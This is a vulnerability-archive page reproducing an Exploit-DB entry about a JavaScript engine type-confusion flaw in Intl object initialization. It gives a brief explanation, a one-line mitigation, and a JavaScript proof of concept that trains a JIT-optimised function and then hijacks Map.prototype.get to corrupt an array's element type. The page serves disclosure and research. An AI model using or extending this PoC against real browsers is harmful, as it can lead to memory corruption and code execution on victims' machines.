header-logo
Suggest Exploit
vendor:
N/A
by:
Anonymous
8.8
CVSS
HIGH
Type Confusion
843
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

Intl Object Property Access Vulnerability

This vulnerability is caused by the Intl object not being initialized, which triggers the initialization process which runs Intl.js without caring about the ImplicitCallFlags flag. The PoC redefines Map.prototype.get to intercept the execution of Intl.js, and arr[0] is set to an empty object. This can lead to type confusion and arbitrary code execution.

Mitigation:

Ensure that the Intl object is initialized before accessing any of its properties.
Source

Exploit-DB raw data:

/*
If the Intl object hasn't been initialized, access to any property of it will trigger the initialization process which will run Intl.js. The problem is that it runs Intl.js without caring about the ImplicitCallFlags flag.

In the PoC, it redefines Map.prototype.get to intercept the execution of Intl.js.

PoC:
*/

function opt(arr, obj) {
    arr[0] = 1.1;
    obj.x;
    arr[0] = 2.3023e-320;
}

let arr = [1.1];
for (let i = 0; i < 0x10000; i++) {
    opt(arr, {});
}

let get = Map.prototype.get;
Map.prototype.get = function (key) {
    Map.prototype.get = get;

    arr[0] = {};

    return this.get(key);
};

opt(arr, Intl);

alert(arr[0]);

Navigation

Suggest Exploit

Services By CQR